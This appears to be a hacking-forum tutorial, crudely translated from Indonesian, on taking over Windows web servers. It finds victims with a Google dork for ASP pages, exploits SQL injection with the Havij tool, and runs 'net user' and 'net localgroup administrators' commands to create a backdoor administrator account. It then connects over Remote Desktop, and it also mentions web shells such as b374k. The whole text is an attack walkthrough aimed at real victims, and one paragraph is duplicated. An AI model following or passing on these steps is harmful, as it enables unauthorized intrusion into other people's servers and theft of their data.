OK, not only we control the web with Shell either b374k or lotus, or whatever name shellnya, we can also use the default Windows feature Remote Desktop, it's just that we still need to know the username and password for access to the server forced.dan we do technique Sql Injection and the username and password the victim is not necessarily the same to login to computer, LHA should continue to do?? we can use Havij for itu.materials are:
Dork.saya use Dork inurl :/ *. Asp? Id =
Havij
internet connection
patience to look for victims
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
if you've done we select the "net localgroup administrators (login name preference) / add" and again click "execute"
The first task, then we open the windows of his facility, which is a remote desktop, how to start-all-accessories-remote program on the desktop, and then we put our target ip and click connect, wait a moment until a connection is made ..
then enter the username and password that we've created earlier ..
and tadaaa .. we got into the victim server
Here Using Comand Shell hosted in Windows
1. Make sure you can access the web administrator, how:
code:
Quote:
| net user |
code:
User accounts for \ \
Quote:
| -------------------------------------------------- ----------------------------- administrator Support_388945a0 tom1983 The command completed with one or more errors. |
code:
Quote:
| bery net user / add |
code:
Quote:
| bery net localgroup administrators / add |
code:
Quote:
| net user bery 1234 |
code:
Quote:
| Start - All Programs - Accessories - Remote Desktop Connection |